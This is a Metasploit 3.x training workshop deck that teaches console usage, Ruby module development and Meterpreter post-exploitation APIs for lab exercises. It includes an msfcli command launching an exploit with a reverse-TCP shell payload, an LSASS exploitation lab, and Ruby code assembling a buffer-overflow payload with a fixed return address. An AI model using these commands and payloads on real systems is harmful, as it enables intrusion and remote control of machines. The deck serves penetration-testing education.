Exploitation Frameworks:
Metasploit 3.x Workshop
Steven McGrath
What to Accomplish
Understanding Metasploit as a user
Understanding the basics of Ruby
Understanding Metasploit as a developer
Understanding Metasploit as an expert
What this is...
To build a better understanding of Metasploit
To learn how to use the framework in exploit research
To learn how to use Metasploit in pen-testing.
What this is NOT...
l33t h@x0r class
Reasons why Metasploit is better than everything else...it isn’t
h@x0ring this network.
You should have...
Backtrack Image (supplied)
VMWare Player/Workstation/Fusion (supplied)
A laptop to run all of this on (NOT supplied)
Starting off
What is Metasploit?
How is it used?
What are other tools?
What benefits does Metasploit have?
What is it?
Metasploit is an exploitation framework, NOT a vulnerability scanner.
How is it used?
Primarily an aid in exploitation research.
Secondarily used in pen-testing.
What are other tools?
CORE Impact
CANVAS
Benefits?
Price
CORE Impact = $25,000 USD a year
CANVAS = $1244 USD + Support
Flexibility
Open Source = More Options
Downsides?
Flexibility
Most Metasploit payloads are Windows-specific.
Completeness
The framework is under active development; however, there are still holes in the framework that need to be addressed.
Metasploit as a User
What to cover?
Control Interfaces
Basic usage
msfconsole
Primary interface into Metasploit
Shell-like (with readline)
Will run external commands
Dynamic interaction with Metasploit
Automation capable
msfconsole
Automation?
Automation is achieved through resource files. They contain a list of commands that msfconsole runs at startup of the console, as if the user had typed them.
msfconsole
Configuration files?
msfconsole has the ability to store per-user configuration data. By default this is stored in ~/.msf3.
msfconsole
Basic Commands:
set, unset
load, unload, loadpath
use, show, back
save
sessions
jobs
route
info
irb
check, exploit, run
msfconsole - set/unset
set - Sets a variable to the specified value. Also can show a list of variables that can be set when run alone.
unset - Will “unset” or remove the value from a variable or series of variables.
setg - Global equivalent of set.
unsetg - Global equivalent of unset.
NOTE: local variables will override globals.
msfconsole - load/unload
load - Will load a plugin from the framework. You can also pass values to optional variables at load.
unload - Will unload a plugin.
loadpath - Adds a module path for the framework to search and load modules. Useful for custom modules.
msfconsole - show/use
show - Will display lists of modules: auxiliary, exploits, payloads, encoders, and nops.
use - Use changes your context within the framework.
back - Returns you to the global context.
msfconsole - save
save - Saves your current state (e.g. current module and set variables)
msfconsole - sessions
sessions - Session interactions...
-i - Interacts with the specified session.
-l - Lists the active sessions.
msfconsole - jobs
jobs - Will display information in regards to backgrounded jobs (typically client-side exploits)
-l - List the active jobs.
-k - Kills the specified job.
msfconsole - route
route - Allows you to interact with the framework routing table (useful in “pivoting”).
msfconsole - info
info - Will display information about the specified module(s).
msfconsole - irb
irb - Provides an interactive Ruby shell into the framework. This is useful for live scripting and/or modification to code.
msfconsole - check/exploit
check - Checks to see if the specified target is vulnerable to an exploit.
exploit - Will launch an exploit on the specified target.
run - Will launch an auxiliary module against the specified target(s).
NOTE: Normally checks are not required to exploit a target.
msfconsole - rcheck/rexploit
rcheck - Will first reload the module from disk before running the check.
rexploit - Same as rcheck, but will launch the actual exploit.
msfcli
Command-line interface
Arguments are passed to tell Metasploit what to do
Traditionally used for automation
msfcli
Example:
./msfcli exploit/example RHOST=192.168.1.100 LHOST=192.168.1.50 PAYLOAD=windows/shell/reverse_tcp E
msfcli
./msfcli -h for more info
msfweb
Web Interface to Metasploit
Ruby on Rails application
The primary interface for Windows
msfgui
Still under HEAVY development
GTK GUI to Metasploit
Attempt to make Metasploit more like CANVAS and CORE from the User’s standpoint
msfd
Network daemon interface.
Listens on port 55554 for telnet connections.
Useful for sharing a running framework without the hassle of screen:
Pivot points
Exploits
Sessions
Before we continue...
From this point on we will be assuming msfconsole
Exploit Me!
Target: 10.0.0.5
Exploit Module to use: windows/smb/ms04_011_lsass
Payload: Anything you choose!
Feel free to ask your classmates and me :)
Metasploit as a Developer
Metasploit as a Developer
This will be a hands-on workshop.
You WILL be writing your own exploit before we leave.
Due to constraints, we will focus on reviewing a few example modules for code examples before the workshop portion.
Starting off...
Getting to know Ruby
A general understanding of how Metasploit 3.x is built
Example Code
Lab
Getting to know Ruby
Interpreted, not compiled.
Object Oriented by design
The red-headed stepchild of Python, Perl, and SmallTalk
Getting to know Ruby
Hello World:
#!/usr/bin/env ruby
# This is the hello world application
var1 = "Hello World!"
print "\n#{var1}\n"
print var1, "\n"
Getting to know Ruby - Lab
Extend the Basic TCP Server in your materials to respond to any input given.
Getting to know Ruby - Lab
require 'socket'

port = 44455
host = "localhost"
server = TCPServer.new(host, port)
# Serve one client at a time; echo each line back with an "R: " prefix
while (session = server.accept)
  while !session.eof?
    session.puts "R: #{session.gets}"
  end
  # Release the socket once the client has hung up
  session.close
end
Metasploit’s Structure - Dirs
data - Data files for the framework
documentation - Examples, Guides, etc.
external - Non-framework software
lib - Framework Libraries
modules - Module root for the framework
plugins - Plugin root for the framework
scripts - Script root for the framework
tools - Development tools
Metasploit’s Structure - Dirs
modules
auxiliary - Auxiliary module root
encoders - Encoder module root
exploits - Exploit module root
nops - NOP module root
payloads - Payload module root
Metasploit’s Structure
What is the difference between an exploit and an auxiliary module?
Exploit modules will actually deliver a payload
Auxiliary modules cover anything else
Metasploit’s Structure
Rex
Ruby Exploitation Library
Derived from Metasploit 2’s Pex libraries
Located in lib/rex
Rex is the base that most of the framework builds upon
Rex Subsystems
Architectures
Encoding
Exploitation
I/O
Logging
Nops
Non-Protocol Parsers
Polymorphic Blocks
Payload
Post-Exploit Clients
Protocols
Services
Sockets
Text Manipulation
User Interface
Framework Core
Core interface into the framework
Handles the core aspects of the framework:
Module interaction (loading, unloading, etc.)
Exploitation handling
Plugins
Sessions
Located under lib/msf/core
Framework Core Classes
Framework
Datastore
EncodedPayload
EventDispatcher
ExploitDriver
Module (Auxiliary, Encoder, Exploit, Nop, Payload)
Handler
OptionContainer
Plugin
Session
Framework Base
Thin interaction layer between Framework Core and Modules, Plugins, and User Interfaces
Digging In...
Now that we have a basic understanding of how the framework is built, it’s time to dig into the plugins and modules themselves...
Metasploit Plugins
Plugins extend the framework dynamically.
Plugins are NOT modules.
All of the User Interfaces are essentially plugins to the framework.
Metasploit Plugins
Example Plugins:
Database support
msfd
Threading
Session hooks
Session taggers
IPS filters
Metasploit Plugins
module Msf
  class Plugin::Example < Msf::Plugin
    module ExampleExtension
      def example_ext
        "This is a Test"
      end
    end

    def initialize(framework, options)
      # Let Msf::Plugin store the framework reference
      super
      # Mix the extension's methods into this framework instance
      framework.extend(ExampleExtension)
    end
  end
end
Framework Modules
Modules perform specific tasks within the framework.
Modules use an extensible, well-defined interface for interaction within the framework.
All modules inherit from Msf::Module.
Metasploit Modules
Common Hash Keys (key - type):
Name - String
Description - String
Version - String
Author - Array
Arch - Array
Platform - PlatformList
Ref - Array
License - String
Example Module
require 'msf/core'

module Msf
  class Auxiliary::Scanner::HTTPScanner < Msf::Auxiliary
    include Exploit::Remote::Tcp
    include Auxiliary::Scanner

    def initialize
      super(
        'Name'        => 'HTTP Scanner',
        'Author'      => 'Maniac <maniac@chigeek.com>',
        'Description' => %q{Scans for HTTP Servers in RHOSTS.}
      )
      register_options(
        [
          Opt::RPORT(80),
          OptString.new("SENDSTRING", [ false, "String to send if port is open", "HEAD / HTTP/1.0\n\n" ])
        ], self.class)
    end

    def run_host(ip)
      connect
      sock.put(datastore['SENDSTRING'])
      data = sock.get_once
      # get_once returns nil when the host sends nothing; to_s avoids a TypeError
      print_status(ip + "\nReceived: " + data.to_s + "\n")
      disconnect
    end
  end
end
Framework Modules - Lab
Use the Lab module template and extend it into a buffer overflow exploit with the following information:
Host: 10.0.0.5
Return: 0xbfbfed20
Buffer: 76 Bytes + [target.ret].pack('V') + payload.encode
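An added example (not part of the workshop materials) that builds the lab buffer from the information above and checks its layout locally before it is ever sent, so a wrong offset or byte order is caught on your own machine. The return value 0xbfbfed20 comes from the lab; `payload` is a constructed stand-in for what payload.encode would supply.

```ruby
# Bytes of filler before the saved return address is overwritten
PAD_LEN = 76

# 76 bytes + [target.ret].pack('V') + payload, exactly as the lab specifies.
# .b keeps everything in binary encoding so mixed-byte strings concatenate.
def build_buffer(target_ret, payload, pad = 'A')
  (pad * PAD_LEN).b + [target_ret].pack('V') + payload.b
end

# Read the address back out of the return slot the way the CPU would:
# 'V' is a 32-bit unsigned little-endian integer.
def ret_in_buffer(buf)
  buf.byteslice(PAD_LEN, 4).unpack('V').first
end

# Checks to run locally before the buffer is used: the return slot holds
# the intended address, the payload follows it intact, and no NUL byte
# (which would truncate a string copy) appears up to and including the slot.
def layout_ok?(buf, target_ret, payload)
  ret_in_buffer(buf) == target_ret &&
    buf.byteslice(PAD_LEN + 4, buf.bytesize) == payload.b &&
    !buf.byteslice(0, PAD_LEN + 4).include?("\x00".b)
end

if __FILE__ == $0
  ret     = 0xbfbfed20        # the lab's return address
  payload = 'P' * 32          # constructed stand-in for payload.encode
  buf     = build_buffer(ret, payload)
  puts buf.byteslice(PAD_LEN, 4).unpack('C*').map { |b| '%02x' % b }.join(' ')  # 20 ed bf bf
  puts layout_ok?(buf, ret, payload)   # true
end
```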
Metasploit as an Expert
Tasty Good Stuff!
Automation
Meterpreter
Attack Automation
Attack Automation
Attack automation can happen in a number of different ways:
Pseudo-Automated
Full Automation
Pseudo-Automation
Resource files for msfconsole.
Custom shell scripts that interact with msfcli.
Custom auxiliary modules.
db_autopwn with:
Existing Nessus data
Existing Nmap data
Full Automation
db_autopwn with db_nmap - db_nmap will scan a network with nmap; db_autopwn then exploits based on what was put into the database.
Meterpreter
Meterpreter
Extensible - extensions can be written to enhance Meterpreter.
Powerful - Flexible protocol and channelized communication.
Stealthy - No disk access and no new process.
In-memory DLL injection
Meterpreter - OMGWTF!
This is how it works:
1. Metasploit sends first stage payload.
2. Payload talks back to Metasploit.
3. Metasploit sends second stage containing a DLL injection payload.
4. Metasploit sends the Meterpreter server DLL.
5. DLL injection payload loads the server DLL in memory.
6. Meterpreter client and server communicate over the established channels.
Meterpreter - UI
client.ui
Method - Description
disable_keyboard - Disables the keyboard
disable_mouse - Disables the mouse
enable_keyboard - Enables the keyboard
enable_mouse - Enables the mouse
idle_time - Returns idle time in seconds
Meterpreter - Filesystem
client.fs.dir
Method - Description
chdir(path) - Change directories
delete(path) - Delete directory
download(dst, src, recursive) - Download content to local
entries(path) - Show contents of directory
getwd - Get the working directory
mkdir(path) - Make directory
upload(dst, src, recursive) - Upload content to host
Meterpreter - Filesystem
client.fs.file
Method - Description
download(dest, files) - Downloads files to local
expand_path(path) - Expands environment strings in path
stat(path) - Returns info on file
upload(dest, files) - Uploads files to remote
Meterpreter - Filesystem
client.fs.file.new
Method - Description
new(file, [r,w]) - Opens file
close - Closes file
read(length) - Reads X bytes from file
seek(offset, whence) - Seeks to offset in file
write(buffer) - Writes buffer to the file
Meterpreter - Networking
client.net.config
Method - Description
add_route(s, n, g) - Adds route
each_interface - Displays interfaces
each_route - Displays routes
get_interfaces - Returns array of interfaces
get_routes - Returns array of routing table
remove_route(s, n, g) - Removes route
Meterpreter - Config
client.sys.config
Method - Description
getuid - Returns process UID
revert_to_self - Calls RevertToSelf
sysinfo - Returns system name and host information
Meterpreter - Power
client.sys.power
Method - Description
reboot(reason) - Reboots host
shutdown(force, reason) - Shuts down host
Meterpreter - Processes
client.sys.process
Method - Description
each_process - Displays running processes
execute(path, args, opts) - Executes binary
getpid - Returns current process
kill(pid) - Kills process
processes - Returns array of processes
open(pid, perms) - Opens process
Meterpreter - Registry
client.sys.registry
Method - Description
close_key(hk) - Closes an open key
create_key(hk, bk, perm) - Creates new key
delete_key(hk, bk, recursive) - Deletes key
delete_value(hk, name) - Deletes reg value
enum_key(hk) - Returns array of subkeys
open_key(hk, bk, perm) - Opens a reg key
query_value(hk, name) - Returns reg value
set_value(hk, name, type, val) - Sets reg value
maniac_scanner.rb 2007-09-04
require 'msf/core'

module Msf
  class Auxiliary::Scanner::ExampleScanner < Msf::Auxiliary
    # Exploit mixins should be added first
    include Exploit::Remote::Tcp
    # Scanner mixin should be included last
    include Auxiliary::Scanner

    def initialize
      super(
        'Name'        => 'Generic Scanner Template',
        'Author'      => 'Maniac <maniac@chigeek.com>',
        'Description' => %q{
          Connect to every host specified in the RHOSTS
          network range, send a probe, read a response, and
          print that response to the screen.
        }
      )
      register_options(
        [
          # Specify the predefined RPORT option
          Opt::RPORT(25),
          # Specify a new option containing the string to send to the server
          OptString.new("SENDSTRING", [ false, "The string to send", "HEAD / HTTP/1.0\n\n" ])
        ], self.class)
    end

    # Work with a single IP address at a time
    def run_host(ip)
      # Call the connect() method provided by the TCP mixin
      connect
      sock.put(datastore['SENDSTRING'])
      data = sock.get_once
      # get_once returns nil when the host sends nothing; to_s avoids a TypeError
      print_status(ip + " Received: " + data.to_s)
      # Call the disconnect() method provided by the TCP mixin
      disconnect
    end
  end
end
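The probe logic of the scanner module above (and of the Example Module earlier in the deck), reworked here as a stand-alone script that runs without Metasploit; this is an added example, not the workshop's own code. It sends the same HEAD request, reads the reply the way sock.get_once does (first chunk, or nil), and handles the nil case that the module's string concatenation would trip over. The fake HTTP server, its port, and the "Constructed/1.0" banner are all constructed for the example.

```ruby
require 'socket'
require 'timeout'

# The probe the scanner module sends (CRLF line endings, as HTTP expects)
PROBE = "HEAD / HTTP/1.0\r\n\r\n"

# Stand-in for the TCP mixin's sock.get_once: return the first chunk the
# peer sends, or nil if it closes or stays silent for `wait` seconds.
def get_once(sock, wait = 2)
  Timeout.timeout(wait) { sock.readpartial(4096) }
rescue EOFError, Errno::ECONNRESET, Timeout::Error
  nil
end

# Connect, send the probe, and describe what came back. A nil reply is
# reported instead of concatenated, which is where the module's
# `ip + " Received: " + data` would raise TypeError.
def probe_host(host, port)
  sock = TCPSocket.new(host, port)
  sock.write(PROBE)
  data = get_once(sock)
  sock.close
  return { open: true, banner: nil } if data.nil?
  status = data.lines.first.to_s.chomp              # e.g. "HTTP/1.0 200 OK"
  server = data[/^Server:\s*(.+)$/i, 1].to_s.strip  # Server header, if any
  { open: true, status: status, server: server }
rescue Errno::ECONNREFUSED
  { open: false }
end

# Constructed stand-in for a real host: answers one connection with the
# given reply, or closes silently when reply is nil. Returns its port.
def fake_http_server(reply)
  srv = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    client = srv.accept
    client.readpartial(4096) rescue nil   # consume the probe
    client.write(reply) if reply
    client.close
    srv.close
  end
  srv.addr[1]
end

if __FILE__ == $0
  port = fake_http_server("HTTP/1.0 200 OK\r\nServer: Constructed/1.0\r\n\r\n")
  p probe_host('127.0.0.1', port)                    # banner and status line
  p probe_host('127.0.0.1', fake_http_server(nil))   # {:open=>true, :banner=>nil}
end
```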
2007-09-05
#!/usr/bin/env ruby
##### Example TCP Server Lab #####
# In this lab you will be modifying the
# code to return any input to the client.
require 'socket'

# Let's define the port and host.
port = 44455
host = "localhost"
# Create a new server connection.
server = TCPServer.new(host, port)
# Let's stay active as long as we are
# accepting connections.
while (session = server.accept)
  # As long as we do not terminate
  # our client, let's stay within this
  # context.
  while !session.eof?
    # Something should go here ;)
  end
end